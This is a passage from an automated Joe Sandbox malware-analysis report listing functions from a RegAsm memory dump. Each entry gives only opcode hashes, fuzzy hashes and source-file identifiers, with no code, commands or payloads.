                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e27388cf9181fae5325eea6f091e1a7e79e7ed9bc4837d1bde97165bfe7561d6
                                          • Instruction ID: 712934e4bf959c40026a9dbab0f8cf434abad7b363d269a44f94b007d4645a73
                                          • Opcode Fuzzy Hash: e27388cf9181fae5325eea6f091e1a7e79e7ed9bc4837d1bde97165bfe7561d6
                                          • Instruction Fuzzy Hash: 57118CB9E0034AEFDB01DFA8E8449AEBBB1EB49310F1041A5D920A7354E7355A16DF91
                                          Function 012DABE0 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7dc52cd1a044237e5a9726969cc63b46a8ee305875233dbf159c73be6128f01f
                                          • Instruction ID: 8a077dd43335fa7d67a08158d9c5fd2063b0b3fbc658bb7edae239c6c7d150f8
                                          • Opcode Fuzzy Hash: 7dc52cd1a044237e5a9726969cc63b46a8ee305875233dbf159c73be6128f01f
                                          • Instruction Fuzzy Hash: E2F0F6313102114B97266A2ED458E2EBADEEFC8E753054479EB05C7361EE21CC038380
                                          Function 012D9D59 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 529670ea219caa8b4c933818a7878f3fceeb0df7e2e2d7a912ee5dd6ab9e028a
                                          • Instruction ID: d5c12e85285fb80efd9feb16381c1c962ffa13245740cbfca5d88985ca5617c0
                                          • Opcode Fuzzy Hash: 529670ea219caa8b4c933818a7878f3fceeb0df7e2e2d7a912ee5dd6ab9e028a
                                          • Instruction Fuzzy Hash: 90F044353001156FDF182EA9985497ABADBEBC8260B148429BA0AC7355DE61CC5187A0
                                          Function 012D9C2C Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a046f87bfbf5c552e30e07bc3462d45c1d9f2de23e1825af9078b60841e3e69e
                                          • Instruction ID: 895a2d4face9c2a32ea4e4ee62fa88493af1a324a30106f72b0075028115756f
                                          • Opcode Fuzzy Hash: a046f87bfbf5c552e30e07bc3462d45c1d9f2de23e1825af9078b60841e3e69e
                                          • Instruction Fuzzy Hash: E9F08C32A10118AFCF10DF69E808AEEBBF5EBC8324F00C03AE908C7214D3314A158B90
                                          Function 012D28A2 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e03c70d54a3f4bbf240f9dfc19bbea3c6983f824dfde9b242a84cc09f141b8ee
                                          • Instruction ID: 20d1735f9f6174d1208ed5dc4c2c6b34a5a1d5e3a03a660ea0474d07ad7cd943
                                          • Opcode Fuzzy Hash: e03c70d54a3f4bbf240f9dfc19bbea3c6983f824dfde9b242a84cc09f141b8ee
                                          • Instruction Fuzzy Hash: 2AE0DF32D14367CBC701EBB09C000EEBB34AEC2221B09466BC0653A190EB341A58C7A1
                                          Function 012D8EF3 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0058cd0230142faefd872c1c4f3f55fbd330c3d81858954af534208dcd828fb2
                                          • Instruction ID: 03a9a5549705052684aaee21c2f1f26fe754e8fe9a21e0b68425401e50dfb999
                                          • Opcode Fuzzy Hash: 0058cd0230142faefd872c1c4f3f55fbd330c3d81858954af534208dcd828fb2
                                          • Instruction Fuzzy Hash: B9D0223351C1202FE335801DBC429FBABDDD3C13B0B6102BBFA4CE320088420C828260
                                          Function 012D28B0 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 752b92b64c92b27268eafcfc17d8a8ee53354b6b961939af0c757cfaefb69637
                                          • Instruction ID: 76d11c61ae604af78a2df147a7dd9ff603c47e304809cef8dd32cb21c2aae4f9
                                          • Opcode Fuzzy Hash: 752b92b64c92b27268eafcfc17d8a8ee53354b6b961939af0c757cfaefb69637
                                          • Instruction Fuzzy Hash: 16D05B31D2126B57CB00E7A5DC044EFF738EED5661B544626D51437140FB702659C7E1
                                          Function 012D6739 Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad5e04c62ae04d879f3596b02ccbfedd44c5f45bf674e75859455b196fcc7c5c
                                          • Instruction ID: 191888f9060b63ddcc13375d6de21678366a8b192efa52b3615fcaf60d925e62
                                          • Opcode Fuzzy Hash: ad5e04c62ae04d879f3596b02ccbfedd44c5f45bf674e75859455b196fcc7c5c
                                          • Instruction Fuzzy Hash: 42E0C23100C3C2CFE703A775FC543453F725B83200F0851B5A0000E6AEDA754846C721
                                          Function 012DAFAD Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f54d8f6638ffe8cc650092a01867fcefb386bbfc2eb2fe44634d282f812532b
                                          • Instruction ID: efa9cf7450c7c04f3bd19404969220382c8af870a696b2e6be8772aac39342e3
                                          • Opcode Fuzzy Hash: 9f54d8f6638ffe8cc650092a01867fcefb386bbfc2eb2fe44634d282f812532b
                                          • Instruction Fuzzy Hash: 6ED0177BB000089FCB008F88E8409DDF776FB88220B048026E911A3260C6319821CB60
                                          Function 012D6748 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.4573580253.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_12d0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ffae7953d8c2f1daede68921793aca3159bb18d1508ed6190cdec0077a6f1f3
                                          • Instruction ID: 010899144503fe5dded86b469e630b946b8dbec9b064566576eee00218ba1133
                                          • Opcode Fuzzy Hash: 1ffae7953d8c2f1daede68921793aca3159bb18d1508ed6190cdec0077a6f1f3
                                          • Instruction Fuzzy Hash: ABC08031004349CBE901F776FC556953F7EE6C0300B409534B5090A75DFE74594647D0